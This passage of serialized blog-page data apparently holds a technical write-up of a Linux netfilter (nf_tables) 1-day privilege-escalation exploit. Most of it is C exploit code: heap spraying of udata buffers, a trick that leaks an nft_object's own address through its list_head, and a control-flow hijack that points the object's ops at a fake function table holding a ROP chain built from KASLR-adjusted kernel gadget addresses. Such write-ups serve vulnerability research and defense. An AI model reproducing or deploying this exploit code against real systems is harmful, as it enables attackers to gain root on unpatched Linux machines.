",{"type":25,"tag":216,"props":59147,"children":59148},{"style":7375},[59149],{"type":31,"value":58464},{"type":25,"tag":216,"props":59151,"children":59152},{"style":6964},[59153],{"type":31,"value":7797},{"type":25,"tag":216,"props":59155,"children":59156},{"class":6922,"line":7005},[59157],{"type":25,"tag":216,"props":59158,"children":59159},{"emptyLinePlaceholder":16},[59160],{"type":31,"value":7642},{"type":25,"tag":216,"props":59162,"children":59163},{"class":6922,"line":7110},[59164],{"type":25,"tag":216,"props":59165,"children":59166},{"style":6927},[59167],{"type":31,"value":59168},"    // check if overlap happened (i.e if we have to overlapping udata buffers)\n",{"type":25,"tag":216,"props":59170,"children":59171},{"class":6922,"line":7216},[59172,59177,59182,59186,59190],{"type":25,"tag":216,"props":59173,"children":59174},{"style":6936},[59175],{"type":31,"value":59176},"    char",{"type":25,"tag":216,"props":59178,"children":59179},{"style":6947},[59180],{"type":31,"value":59181}," spray_name",{"type":25,"tag":216,"props":59183,"children":59184},{"style":6964},[59185],{"type":31,"value":7701},{"type":25,"tag":216,"props":59187,"children":59188},{"style":6989},[59189],{"type":31,"value":44811},{"type":25,"tag":216,"props":59191,"children":59192},{"style":6964},[59193],{"type":31,"value":35536},{"type":25,"tag":216,"props":59195,"children":59196},{"class":6922,"line":7244},[59197,59201,59205,59209,59213,59217],{"type":25,"tag":216,"props":59198,"children":59199},{"style":6936},[59200],{"type":31,"value":59176},{"type":25,"tag":216,"props":59202,"children":59203},{"style":6953},[59204],{"type":31,"value":13773},{"type":25,"tag":216,"props":59206,"children":59207},{"style":6947},[59208],{"type":31,"value":59067},{"type":25,"tag":216,"props":59210,"children":59211},{"style":6964},[59212],{"type":31,"value":7701},{"type":25,"tag":216,"props":59214,"children":59215},{"style":6989},[59216],{"type":31,"value":21253},{"type":25,"tag":216,"props":59218,"children":59219},{"style":6964},[59220],{"type":31,"value":35536},{"type":25,"tag":216,"props":59222,"children":59223},{"class":6922,"line":7257},[59224,59228,59232,59236,59240,59244,59248,59252,59256,59260,59264,59268],{"type":25,"tag":216,"props":59225,"children":59226},{"style":6973},[59227],{"type":31,"value":6976},{"type":25,"tag":216,"props":59229,"children":59230},{"style":6964},[59231],{"type":31,"value":7016},{"type":25,"tag":216,"props":59233,"children":59234},{"style":6936},[59235],{"type":31,"value":23007},{"type":25,"tag":216,"props":59237,"children":59238},{"style":6964},[59239],{"type":31,"value":58512},{"type":25,"tag":216,"props":59241,"children":59242},{"style":6953},[59243],{"type":31,"value":266},{"type":25,"tag":216,"props":59245,"children":59246},{"style":6989},[59247],{"type":31,"value":6992},{"type":25,"tag":216,"props":59249,"children":59250},{"style":6964},[59251],{"type":31,"value":55202},{"type":25,"tag":216,"props":59253,"children":59254},{"style":6953},[59255],{"type":31,"value":9757},{"type":25,"tag":216,"props":59257,"children":59258},{"style":6989},[59259],{"type":31,"value":23059},{"type":25,"tag":216,"props":59261,"children":59262},{"style":6964},[59263],{"type":31,"value":55233},{"type":25,"tag":216,"props":59265,"children":59266},{"style":6953},[59267],{"type":31,"value":55238},{"type":25,"tag":216,"props":59269,"children":59270},{"style":6964},[59271],{"type":31,"value":7107},{"type":25,"tag":216,"props":59273,"children":59274},{"class":6922,"line":7275},[59275],{"type":25,"tag":216,"props":59276,"children":59277},{"style":6964},[59278],{"type":31,"value":33147},{"type":25,"tag":216,"props":59280,"children":59281},{"class":6922,"line":7296},[59282,59287,59292,59297,59302,59307],{"type":25,"tag":216,"props":59283,"children":59284},{"style":7047},[59285],{"type":31,"value":59286},"        snprintf",{"type":25,"tag":216,"props":59288,"children":59289},{"style":6964},[59290],{"type":31,"value":59291},"(spray_name, ",{"type":25,"tag":216,"props":59293,"children":59294},{"style":6936},[59295],{"type":31,"value":59296},"sizeof",{"type":25,"tag":216,"props":59298,"children":59299},{"style":6964},[59300],{"type":31,"value":59301},"(spray_name), ",{"type":25,"tag":216,"props":59303,"children":59304},{"style":8205},[59305],{"type":31,"value":59306},"\"spray-%i\"",{"type":25,"tag":216,"props":59308,"children":59309},{"style":6964},[59310],{"type":31,"value":59311},", i);\n",{"type":25,"tag":216,"props":59313,"children":59314},{"class":6922,"line":7305},[59315,59320,59324,59328,59333],{"type":25,"tag":216,"props":59316,"children":59317},{"style":6947},[59318],{"type":31,"value":59319},"        udata",{"type":25,"tag":216,"props":59321,"children":59322},{"style":6964},[59323],{"type":31,"value":58564},{"type":25,"tag":216,"props":59325,"children":59326},{"style":6953},[59327],{"type":31,"value":266},{"type":25,"tag":216,"props":59329,"children":59330},{"style":7047},[59331],{"type":31,"value":59332}," getudata",{"type":25,"tag":216,"props":59334,"children":59335},{"style":6964},[59336],{"type":31,"value":59337},"(nl, spray_name);\n",{"type":25,"tag":216,"props":59339,"children":59340},{"class":6922,"line":7557},[59341],{"type":25,"tag":216,"props":59342,"children":59343},{"style":6964},[59344],{"type":31,"value":7311},{"type":25,"tag":216,"props":59346,"children":59347},{"class":6922,"line":7574},[59348,59352,59356,59360,59364,59368,59372,59376,59380,59384,59389,59393,59397,59401,59405],{"type":25,"tag":216,"props":59349,"children":59350},{"style":6973},[59351],{"type":31,"value":16235},{"type":25,"tag":216,"props":59353,"children":59354},{"style":6964},[59355],{"type":31,"value":7016},{"type":25,"tag":216,"props":59357,"children":59358},{"style":6947},[59359],{"type":31,"value":59067},{"type":25,"tag":216,"props":59361,"children":59362},{"style":6964},[59363],{"type":31,"value":7701},{"type":25,"tag":216,"props":59365,"children":59366},{"style":6989},[59367],{"type":31,"value":1882},{"type":25,"tag":216,"props":59369,"children":59370},{"style":6964},[59371],{"type":31,"value":52927},{"type":25,"tag":216,"props":59373,"children":59374},{"style":6989},[59375],{"type":31,"value":1882},{"type":25,"tag":216,"props":59377,"children":59378},{"style":6964},[59379],{"type":31,"value":12614},{"type":25,"tag":216,"props":59381,"children":59382},{"style":6953},[59383],{"type":31,"value":12528},{"type":25,"tag":216,"props":59385,"children":59386},{"style":6947},[59387],{"type":31,"value":59388}," udata",{"type":25,"tag":216,"props":59390,"children":59391},{"style":6964},[59392],{"type":31,"value":7701},{"type":25,"tag":216,"props":59394,"children":59395},{"style":6989},[59396],{"type":31,"value":331},{"type":25,"tag":216,"props":59398,"children":59399},{"style":6964},[59400],{"type":31,"value":52927},{"type":25,"tag":216,"props":59402,"children":59403},{"style":6989},[59404],{"type":31,"value":1882},{"type":25,"tag":216,"props":59406,"children":59407},{"style":6964},[59408],{"type":31,"value":59409},"])\n",{"type":25,"tag":216,"props":59411,"children":59412},{"class":6922,"line":7591},[59413],{"type":25,"tag":216,"props":59414,"children":59415},{"style":6964},[59416],{"type":31,"value":33147},{"type":25,"tag":216,"props":59418,"children":59419},{"class":6922,"line":7604},[59420,59425,59429,59434],{"type":25,"tag":216,"props":59421,"children":59422},{"style":7047},[59423],{"type":31,"value":59424},"        puts",{"type":25,"tag":216,"props":59426,"children":59427},{"style":6964},[59428],{"type":31,"value":1850},{"type":25,"tag":216,"props":59430,"children":59431},{"style":8205},[59432],{"type":31,"value":59433},"\"[+] got duplicated table\"",{"type":25,"tag":216,"props":59435,"children":59436},{"style":6964},[59437],{"type":31,"value":7797},{"type":25,"tag":216,"props":59439,"children":59440},{"class":6922,"line":7613},[59441],{"type":25,"tag":216,"props":59442,"children":59443},{"style":6964},[59444],{"type":31,"value":7311},{"type":25,"tag":216,"props":59446,"children":59447},{"class":6922,"line":7636},[59448],{"type":25,"tag":216,"props":59449,"children":59450},{"emptyLinePlaceholder":16},[59451],{"type":31,"value":7642},{"type":25,"tag":216,"props":59453,"children":59454},{"class":6922,"line":7645},[59455],{"type":25,"tag":216,"props":59456,"children":59457},{"style":6927},[59458],{"type":31,"value":59459},"    // Replace one of the udata buffers with nft_object\n",{"type":25,"tag":216,"props":59461,"children":59462},{"class":6922,"line":7654},[59463],{"type":25,"tag":216,"props":59464,"children":59465},{"style":6927},[59466],{"type":31,"value":59467},"    // and read it's counterpart to leak the nft_object struct\n",{"type":25,"tag":216,"props":59469,"children":59470},{"class":6922,"line":7722},[59471,59476,59480,59485],{"type":25,"tag":216,"props":59472,"children":59473},{"style":7047},[59474],{"type":31,"value":59475},"    puts",{"type":25,"tag":216,"props":59477,"children":59478},{"style":6964},[59479],{"type":31,"value":1850},{"type":25,"tag":216,"props":59481,"children":59482},{"style":8205},[59483],{"type":31,"value":59484},"\"[*] Info leak\"",{"type":25,"tag":216,"props":59486,"children":59487},{"style":6964},[59488],{"type":31,"value":7797},{"type":25,"tag":216,"props":59490,"children":59491},{"class":6922,"line":7730},[59492,59497,59502,59506,59510,59514],{"type":25,"tag":216,"props":59493,"children":59494},{"style":7047},[59495],{"type":31,"value":59496},"    deludata_spray",{"type":25,"tag":216,"props":59498,"children":59499},{"style":6964},[59500],{"type":31,"value":59501},"(nl, ",{"type":25,"tag":216,"props":59503,"children":59504},{"style":6989},[59505],{"type":31,"value":1882},{"type":25,"tag":216,"props":59507,"children":59508},{"style":6964},[59509],{"type":31,"value":7026},{"type":25,"tag":216,"props":59511,"children":59512},{"style":6989},[59513],{"type":31,"value":184},{"type":25,"tag":216,"props":59515,"children":59516},{"style":6964},[59517],{"type":31,"value":7797},{"type":25,"tag":216,"props":59519,"children":59520},{"class":6922,"line":7760},[59521,59526],{"type":25,"tag":216,"props":59522,"children":59523},{"style":7047},[59524],{"type":31,"value":59525},"    wait_destroyer",{"type":25,"tag":216,"props":59527,"children":59528},{"style":6964},[59529],{"type":31,"value":7633},{"type":25,"tag":216,"props":59531,"children":59532},{"class":6922,"line":7768},[59533,59538,59542,59546,59550,59554,59558,59562,59566,59570],{"type":25,"tag":216,"props":59534,"children":59535},{"style":7047},[59536],{"type":31,"value":59537},"    obj_spray",{"type":25,"tag":216,"props":59539,"children":59540},{"style":6964},[59541],{"type":31,"value":59501},{"type":25,"tag":216,"props":59543,"children":59544},{"style":6989},[59545],{"type":31,"value":1882},{"type":25,"tag":216,"props":59547,"children":59548},{"style":6964},[59549],{"type":31,"value":7026},{"type":25,"tag":216,"props":59551,"children":59552},{"style":6989},[59553],{"type":31,"value":184},{"type":25,"tag":216,"props":59555,"children":59556},{"style":6964},[59557],{"type":31,"value":7026},{"type":25,"tag":216,"props":59559,"children":59560},{"style":6936},[59561],{"type":31,"value":58464},{"type":25,"tag":216,"props":59563,"children":59564},{"style":6964},[59565],{"type":31,"value":7026},{"type":25,"tag":216,"props":59567,"children":59568},{"style":6989},[59569],{"type":31,"value":1882},{"type":25,"tag":216,"props":59571,"children":59572},{"style":6964},[59573],{"type":31,"value":7797},{"type":25,"tag":216,"props":59575,"children":59576},{"class":6922,"line":7800},[59577,59582,59586,59591,59595,59599,59604,59608,59612,59617,59621,59626],{"type":25,"tag":216,"props":59578,"children":59579},{"style":6936},[59580],{"type":31,"value":59581},"    uint64_t",{"type":25,"tag":216,"props":59583,"children":59584},{"style":6953},[59585],{"type":31,"value":13773},{"type":25,"tag":216,"props":59587,"children":59588},{"style":6964},[59589],{"type":31,"value":59590},"fake_obj ",{"type":25,"tag":216,"props":59592,"children":59593},{"style":6953},[59594],{"type":31,"value":266},{"type":25,"tag":216,"props":59596,"children":59597},{"style":6964},[59598],{"type":31,"value":7016},{"type":25,"tag":216,"props":59600,"children":59601},{"style":6936},[59602],{"type":31,"value":59603},"uint64_t",{"type":25,"tag":216,"props":59605,"children":59606},{"style":6953},[59607],{"type":31,"value":13773},{"type":25,"tag":216,"props":59609,"children":59610},{"style":6964},[59611],{"type":31,"value":1888},{"type":25,"tag":216,"props":59613,"children":59614},{"style":7047},[59615],{"type":31,"value":59616},"getudata",{"type":25,"tag":216,"props":59618,"children":59619},{"style":6964},[59620],{"type":31,"value":59501},{"type":25,"tag":216,"props":59622,"children":59623},{"style":8205},[59624],{"type":31,"value":59625},"\"spray-2\"",{"type":25,"tag":216,"props":59627,"children":59628},{"style":6964},[59629],{"type":31,"value":7797},{"type":25,"tag":216,"props":59631,"children":59632},{"class":6922,"line":7808},[59633],{"type":25,"tag":216,"props":59634,"children":59635},{"style":6964},[59636],{"type":31,"value":14275},{"type":25,"tag":606,"props":59638,"children":59640},{"id":59639},"leaking-self-pointer-of-nft_object",[59641,59643],{"type":31,"value":59642},"Leaking self pointer of ",{"type":25,"tag":82,"props":59644,"children":59646},{"className":59645},[],[59647],{"type":31,"value":59082},{"type":25,"tag":38,"props":59649,"children":59650},{},[59651,59653,59658,59660,59665,59667,59672,59674,59680],{"type":31,"value":59652},"As I'll discuss in more depth in the ROP section, the exploit relies on a known address of controllable memory to work. I decided to use the ",{"type":25,"tag":82,"props":59654,"children":59656},{"className":59655},[],[59657],{"type":31,"value":59082},{"type":31,"value":59659}," to get its own address. This is possible because the ",{"type":25,"tag":82,"props":59661,"children":59663},{"className":59662},[],[59664],{"type":31,"value":59082},{"type":31,"value":59666}," has a ",{"type":25,"tag":82,"props":59668,"children":59670},{"className":59669},[],[59671],{"type":31,"value":59067},{"type":31,"value":59673}," pointer (similar to ",{"type":25,"tag":82,"props":59675,"children":59677},{"className":59676},[],[59678],{"type":31,"value":59679},"table->udata",{"type":31,"value":59681}," that I used for leaking KASLR), that I can use to read/write data.",{"type":25,"tag":38,"props":59683,"children":59684},{},[59685,59686,59691,59693,59699,59701,59706,59708,59714,59716,59722,59724,59729,59731,59736,59738,59743,59745],{"type":31,"value":474},{"type":25,"tag":82,"props":59687,"children":59689},{"className":59688},[],[59690],{"type":31,"value":59082},{"type":31,"value":59692}," struct also contains a ",{"type":25,"tag":82,"props":59694,"children":59696},{"className":59695},[],[59697],{"type":31,"value":59698},"list_head",{"type":31,"value":59700}," inserted in a circular list containing all ",{"type":25,"tag":82,"props":59702,"children":59704},{"className":59703},[],[59705],{"type":31,"value":59082},{"type":31,"value":59707},"'s that belong to a given ",{"type":25,"tag":82,"props":59709,"children":59711},{"className":59710},[],[59712],{"type":31,"value":59713},"table",{"type":31,"value":59715},". Considering that our object is currently alone in its table, the ",{"type":25,"tag":82,"props":59717,"children":59719},{"className":59718},[],[59720],{"type":31,"value":59721},"table->list.next",{"type":31,"value":59723}," pointer in the ",{"type":25,"tag":82,"props":59725,"children":59727},{"className":59726},[],[59728],{"type":31,"value":59082},{"type":31,"value":59730}," will point back to the ",{"type":25,"tag":82,"props":59732,"children":59734},{"className":59733},[],[59735],{"type":31,"value":59698},{"type":31,"value":59737}," contained in the ",{"type":25,"tag":82,"props":59739,"children":59741},{"className":59740},[],[59742],{"type":31,"value":59713},{"type":31,"value":59744}," and vice-versa.\n",{"type":25,"tag":6467,"props":59746,"children":59748},{"alt":54547,"src":59747},"/posts/netfilter-universal-root-1-day/nft-object.png",[],{"type":25,"tag":38,"props":59750,"children":59751},{},[59752,59754,59759,59761,59766,59768,59774,59776,59781,59782,59787,59789,59794,59796,59801],{"type":31,"value":59753},"In short, that means that if we swap the ",{"type":25,"tag":82,"props":59755,"children":59757},{"className":59756},[],[59758],{"type":31,"value":59067},{"type":31,"value":59760}," pointer of the ",{"type":25,"tag":82,"props":59762,"children":59764},{"className":59763},[],[59765],{"type":31,"value":59082},{"type":31,"value":59767}," with its own ",{"type":25,"tag":82,"props":59769,"children":59771},{"className":59770},[],[59772],{"type":31,"value":59773},"list.next",{"type":31,"value":59775}," pointer we should be able to read a pointer back to the ",{"type":25,"tag":82,"props":59777,"children":59779},{"className":59778},[],[59780],{"type":31,"value":59082},{"type":31,"value":56307},{"type":25,"tag":82,"props":59783,"children":59785},{"className":59784},[],[59786],{"type":31,"value":59698},{"type":31,"value":59788}," which is also the start of the ",{"type":25,"tag":82,"props":59790,"children":59792},{"className":59791},[],[59793],{"type":31,"value":59082},{"type":31,"value":59795}," itself.\n",{"type":25,"tag":9273,"props":59797,"children":59798},{},[59799],{"type":31,"value":59800},"NOTE:",{"type":31,"value":59802}," This is a novel small trick.",{"type":25,"tag":206,"props":59804,"children":59806},{"className":33070,"code":59805,"language":33072,"meta":7,"style":7},"[...]\n    // Leak nft_object ptr using table linked list\n    fake_obj[8] = 8;           // ulen = 8\n    fake_obj[9] = fake_obj[0]; // udata = list->next\n    deludata_spray(nl, 2, 1);\n    wait_destroyer();\n    udata_spray(nl, 0xe8, 3, 1, fake_obj);\n\n    get_obj(nl, \"spray-0\", true);\n    printf(\"[*] nft_object ptr: 0x%lx\\n\", obj_ptr);\n[...]\n",[59807],{"type":25,"tag":82,"props":59808,"children":59809},{"__ignoreMap":7},[59810,59817,59825,59838,59886,59913,59924,59962,59969,59998,60028],{"type":25,"tag":216,"props":59811,"children":59812},{"class":6922,"line":6923},[59813],{"type":25,"tag":216,"props":59814,"children":59815},{"style":6964},[59816],{"type":31,"value":14275},{"type":25,"tag":216,"props":59818,"children":59819},{"class":6922,"line":6769},[59820],{"type":25,"tag":216,"props":59821,"children":59822},{"style":6964},[59823],{"type":31,"value":59824},"    // Leak nft_object ptr using table linked list\n",{"type":25,"tag":216,"props":59826,"children":59827},{"class":6922,"line":6778},[59828,59833],{"type":25,"tag":216,"props":59829,"children":59830},{"style":6964},[59831],{"type":31,"value":59832},"    fake_obj[8] = 8;",{"type":25,"tag":216,"props":59834,"children":59835},{"style":6927},[59836],{"type":31,"value":59837},"           // ulen = 8\n",{"type":25,"tag":216,"props":59839,"children":59840},{"class":6922,"line":7005},[59841,59846,59850,59855,59859,59863,59868,59872,59876,59881],{"type":25,"tag":216,"props":59842,"children":59843},{"style":6947},[59844],{"type":31,"value":59845},"    fake_obj",{"type":25,"tag":216,"props":59847,"children":59848},{"style":6964},[59849],{"type":31,"value":7701},{"type":25,"tag":216,"props":59851,"children":59852},{"style":6989},[59853],{"type":31,"value":59854},"9",{"type":25,"tag":216,"props":59856,"children":59857},{"style":6964},[59858],{"type":31,"value":12614},{"type":25,"tag":216,"props":59860,"children":59861},{"style":6953},[59862],{"type":31,"value":266},{"type":25,"tag":216,"props":59864,"children":59865},{"style":6947},[59866],{"type":31,"value":59867}," fake_obj",{"type":25,"tag":216,"props":59869,"children":59870},{"style":6964},[59871],{"type":31,"value":7701},{"type":25,"tag":216,"props":59873,"children":59874},{"style":6989},[59875],{"type":31,"value":1882},{"type":25,"tag":216,"props":59877,"children":59878},{"style":6964},[59879],{"type":31,"value":59880},"];",{"type":25,"tag":216,"props":59882,"children":59883},{"style":6927},[59884],{"type":31,"value":59885}," // udata = list->next\n",{"type":25,"tag":216,"props":59887,"children":59888},{"class":6922,"line":7110},[59889,59893,59897,59901,59905,59909],{"type":25,"tag":216,"props":59890,"children":59891},{"style":7047},[59892],{"type":31,"value":59496},{"type":25,"tag":216,"props":59894,"children":59895},{"style":6964},[59896],{"type":31,"value":59501},{"type":25,"tag":216,"props":59898,"children":59899},{"style":6989},[59900],{"type":31,"value":331},{"type":25,"tag":216,"props":59902,"children":59903},{"style":6964},[59904],{"type":31,"value":7026},{"type":25,"tag":216,"props":59906,"children":59907},{"style":6989},[59908],{"type":31,"value":184},{"type":25,"tag":216,"props":59910,"children":59911},{"style":6964},[59912],{"type":31,"value":7797},{"type":25,"tag":216,"props":59914,"children":59915},{"class":6922,"line":7216},[59916,59920],{"type":25,"tag":216,"props":59917,"children":59918},{"style":7047},[59919],{"type":31,"value":59525},{"type":25,"tag":216,"props":59921,"children":59922},{"style":6964},[59923],{"type":31,"value":7633},{"type":25,"tag":216,"props":59925,"children":59926},{"class":6922,"line":7244},[59927,59932,59936,59941,59945,59949,59953,59957],{"type":25,"tag":216,"props":59928,"children":59929},{"style":7047},[59930],{"type":31,"value":59931},"    udata_spray",{"type":25,"tag":216,"props":59933,"children":59934},{"style":6964},[59935],{"type":31,"value":59501},{"type":25,"tag":216,"props":59937,"children":59938},{"style":6989},[59939],{"type":31,"value":59940},"0xe8",{"type":25,"tag":216,"props":59942,"children":59943},{"style":6964},[59944],{"type":31,"value":7026},{"type":25,"tag":216,"props":59946,"children":59947},{"style":6989},[59948],{"type":31,"value":21253},{"type":25,"tag":216,"props":59950,"children":59951},{"style":6964},[59952],{"type":31,"value":7026},{"type":25,"tag":216,"props":59954,"children":59955},{"style":6989},[59956],{"type":31,"value":184},{"type":25,"tag":216,"props":59958,"children":59959},{"style":6964},[59960],{"type":31,"value":59961},", fake_obj);\n",{"type":25,"tag":216,"props":59963,"children":59964},{"class":6922,"line":7257},[59965],{"type":25,"tag":216,"props":59966,"children":59967},{"emptyLinePlaceholder":16},[59968],{"type":31,"value":7642},{"type":25,"tag":216,"props":59970,"children":59971},{"class":6922,"line":7275},[59972,59977,59981,59986,59990,59994],{"type":25,"tag":216,"props":59973,"children":59974},{"style":7047},[59975],{"type":31,"value":59976},"    get_obj",{"type":25,"tag":216,"props":59978,"children":59979},{"style":6964},[59980],{"type":31,"value":59501},{"type":25,"tag":216,"props":59982,"children":59983},{"style":8205},[59984],{"type":31,"value":59985},"\"spray-0\"",{"type":25,"tag":216,"props":59987,"children":59988},{"style":6964},[59989],{"type":31,"value":7026},{"type":25,"tag":216,"props":59991,"children":59992},{"style":6936},[59993],{"type":31,"value":230},{"type":25,"tag":216,"props":59995,"children":59996},{"style":6964},[59997],{"type":31,"value":7797},{"type":25,"tag":216,"props":59999,"children":60000},{"class":6922,"line":7296},[60001,60006,60010,60015,60019,60023],{"type":25,"tag":216,"props":60002,"children":60003},{"style":7047},[60004],{"type":31,"value":60005},"    printf",{"type":25,"tag":216,"props":60007,"children":60008},{"style":6964},[60009],{"type":31,"value":1850},{"type":25,"tag":216,"props":60011,"children":60012},{"style":8205},[60013],{"type":31,"value":60014},"\"[*] nft_object ptr: 0x%lx",{"type":25,"tag":216,"props":60016,"children":60017},{"style":52342},[60018],{"type":31,"value":52345},{"type":25,"tag":216,"props":60020,"children":60021},{"style":8205},[60022],{"type":31,"value":24020},{"type":25,"tag":216,"props":60024,"children":60025},{"style":6964},[60026],{"type":31,"value":60027},", obj_ptr);\n",{"type":25,"tag":216,"props":60029,"children":60030},{"class":6922,"line":7305},[60031],{"type":25,"tag":216,"props":60032,"children":60033},{"style":6964},[60034],{"type":31,"value":14275},{"type":25,"tag":606,"props":60036,"children":60038},{"id":60037},"hijacking-control-flow",[60039],{"type":31,"value":60040},"Hijacking control-flow",{"type":25,"tag":38,"props":60042,"children":60043},{},[60044,60046,60051,60053,60058,60060,60065,60067,60072,60074,60079,60081],{"type":31,"value":60045},"To hijack control-flow, we can use ",{"type":25,"tag":82,"props":60047,"children":60049},{"className":60048},[],[60050],{"type":31,"value":59082},{"type":31,"value":60052}," once again. The ",{"type":25,"tag":82,"props":60054,"children":60056},{"className":60055},[],[60057],{"type":31,"value":59082},{"type":31,"value":60059}," struct has an ",{"type":25,"tag":82,"props":60061,"children":60063},{"className":60062},[],[60064],{"type":31,"value":56638},{"type":31,"value":60066}," pointer to a function pointer table. We can swap the ",{"type":25,"tag":82,"props":60068,"children":60070},{"className":60069},[],[60071],{"type":31,"value":56638},{"type":31,"value":60073}," pointer with the ",{"type":25,"tag":82,"props":60075,"children":60077},{"className":60076},[],[60078],{"type":31,"value":59067},{"type":31,"value":60080}," pointer, taking control of the pointer table.\n",{"type":25,"tag":6467,"props":60082,"children":60084},{"alt":54547,"src":60083},"/posts/netfilter-universal-root-1-day/control-flow.png",[],{"type":25,"tag":206,"props":60086,"children":60088},{"className":33070,"code":60087,"language":33072,"meta":7,"style":7},"[...]\n    // Fake ops\n    uint64_t *rop = calloc(29, sizeof(uint64_t));\n    rop[0] = kaslr_slide + 0xffffffff81988647; // push rsi; jmp qword ptr [rsi + 0x39];\n    rop[2] = kaslr_slide + NFT_CT_EXPECT_OBJ_TYPE;\n[...]\n    // Send ROP in object udata\n    del_obj(nl, \"spray-0\");\n    wait_destroyer();\n    obj_spray(nl, 1, 1, rop, 0xb8);\n    fake_obj = (uint64_t *)getudata(nl, \"spray-3\");\n    DumpHex(fake_obj, 0xe8);\n    uint64_t rop_addr = fake_obj[9]; // udata ptr\n    printf(\"[*] ROP addr: 0x%lx\\n\", rop_addr);\n\n    // Point to fake ops\n    fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n[...]\n    // Write ROP\n    puts(\"[*] Write ROP\");\n    deludata_spray(nl, 3, 1);\n    wait_destroyer();\n    udata_spray(nl, 0xe8, 4, 1, fake_obj);\n\n    // Takeover RIP\n    puts(\"[*] Takeover RIP\");\n    dump_obj(nl, \"spray-1\");\n[...]\n",[60089],{"type":25,"tag":82,"props":60090,"children":60091},{"__ignoreMap":7},[60092,60099,60107,60131,60178,60214,60221,60229,60261,60269,60277,60298,60306,60314,60377,60384,60392,60400,60407,60415,60449,60457,60464,60472,60479,60487,60520,60541],{"type":25,"tag":216,"props":60093,"children":60094},{"class":6922,"line":6923},[60095],{"type":25,"tag":216,"props":60096,"children":60097},{"style":6964},[60098],{"type":31,"value":14275},{"type":25,"tag":216,"props":60100,"children":60101},{"class":6922,"line":6769},[60102],{"type":25,"tag":216,"props":60103,"children":60104},{"style":6964},[60105],{"type":31,"value":60106},"    // Fake ops\n",{"type":25,"tag":216,"props":60108,"children":60109},{"class":6922,"line":6778},[60110,60115,60119,60123,60127],{"type":25,"tag":216,"props":60111,"children":60112},{"style":6964},[60113],{"type":31,"value":60114},"    uint64_t *rop = calloc(29, ",{"type":25,"tag":216,"props":60116,"children":60117},{"style":7375},[60118],{"type":31,"value":59296},{"type":25,"tag":216,"props":60120,"children":60121},{"style":6964},[60122],{"type":31,"value":1850},{"type":25,"tag":216,"props":60124,"children":60125},{"style":6936},[60126],{"type":31,"value":59603},{"type":25,"tag":216,"props":60128,"children":60129},{"style":6964},[60130],{"type":31,"value":11175},{"type":25,"tag":216,"props":60132,"children":60133},{"class":6922,"line":7005},[60134,60139,60143,60147,60151,60155,60160,60164,60169,60173],{"type":25,"tag":216,"props":60135,"children":60136},{"style":6947},[60137],{"type":31,"value":60138},"    rop",{"type":25,"tag":216,"props":60140,"children":60141},{"style":6964},[60142],{"type":31,"value":7701},{"type":25,"tag":216,"props":60144,"children":60145},{"style":6989},[60146],{"type":31,"value":1882},{"type":25,"tag":216,"props":60148,"children":60149},{"style":6964},[60150],{"type":31,"value":12614},{"type":25,"tag":216,"props":60152,"children":60153},{"style":6953},[60154],{"type":31,"value":266},{"type":25,"tag":216,"props":60156,"children":60157},{"style":6964},[60158],{"type":31,"value":60159}," kaslr_slide ",{"type":25,"tag":216,"props":60161,"children":60162},{"style":6953},[60163],{"type":31,"value":3539},{"type":25,"tag":216,"props":60165,"children":60166},{"style":6989},[60167],{"type":31,"value":60168}," 0xffffffff81988647",{"type":25,"tag":216,"props":60170,"children":60171},{"style":6964},[60172],{"type":31,"value":53043},{"type":25,"tag":216,"props":60174,"children":60175},{"style":6927},[60176],{"type":31,"value":60177}," // push rsi; jmp qword ptr [rsi + 0x39];\n",{"type":25,"tag":216,"props":60179,"children":60180},{"class":6922,"line":7110},[60181,60185,60189,60193,60197,60201,60205,60209],{"type":25,"tag":216,"props":60182,"children":60183},{"style":6947},[60184],{"type":31,"value":60138},{"type":25,"tag":216,"props":60186,"children":60187},{"style":6964},[60188],{"type":31,"value":7701},{"type":25,"tag":216,"props":60190,"children":60191},{"style":6989},[60192],{"type":31,"value":331},{"type":25,"tag":216,"props":60194,"children":60195},{"style":6964},[60196],{"type":31,"value":12614},{"type":25,"tag":216,"props":60198,"children":60199},{"style":6953},[60200],{"type":31,"value":266},{"type":25,"tag":216,"props":60202,"children":60203},{"style":6964},[60204],{"type":31,"value":60159},{"type":25,"tag":216,"props":60206,"children":60207},{"style":6953},[60208],{"type":31,"value":3539},{"type":25,"tag":216,"props":60210,"children":60211},{"style":6964},[60212],{"type":31,"value":60213}," NFT_CT_EXPECT_OBJ_TYPE;\n",{"type":25,"tag":216,"props":60215,"children":60216},{"class":6922,"line":7216},[60217],{"type":25,"tag":216,"props":60218,"children":60219},{"style":6964},[60220],{"type":31,"value":14275},{"type":25,"tag":216,"props":60222,"children":60223},{"class":6922,"line":7244},[60224],{"type":25,"tag":216,"props":60225,"children":60226},{"style":6964},[60227],{"type":31,"value":60228},"    // Send ROP in object udata\n",{"type":25,"tag":216,"props":60230,"children":60231},{"class":6922,"line":7257},[60232,60237,60241,60246,60251,60256],{"type":25,"tag":216,"props":60233,"children":60234},{"style":6964},[60235],{"type":31,"value":60236},"    del_obj(",{"type":25,"tag":216,"props":60238,"children":60239},{"style":7375},[60240],{"type":31,"value":58258},{"type":25,"tag":216,"props":60242,"children":60243},{"style":6964},[60244],{"type":31,"value":60245},", \"",{"type":25,"tag":216,"props":60247,"children":60248},{"style":7375},[60249],{"type":31,"value":60250},"spray",{"type":25,"tag":216,"props":60252,"children":60253},{"style":6964},[60254],{"type":31,"value":60255},"-0",{"type":25,"tag":216,"props":60257,"children":60258},{"style":8205},[60259],{"type":31,"value":60260},"\");\n",{"type":25,"tag":216,"props":60262,"children":60263},{"class":6922,"line":7275},[60264],{"type":25,"tag":216,"props":60265,"children":60266},{"style":8205},[60267],{"type":31,"value":60268},"    wait_destroyer();\n",{"type":25,"tag":216,"props":60270,"children":60271},{"class":6922,"line":7296},[60272],{"type":25,"tag":216,"props":60273,"children":60274},{"style":8205},[60275],{"type":31,"value":60276},"    obj_spray(nl, 1, 1, rop, 0xb8);\n",{"type":25,"tag":216,"props":60278,"children":60279},{"class":6922,"line":7305},[60280,60285,60289,60294],{"type":25,"tag":216,"props":60281,"children":60282},{"style":8205},[60283],{"type":31,"value":60284},"    fake_obj = (uint64_t *)getudata(nl, 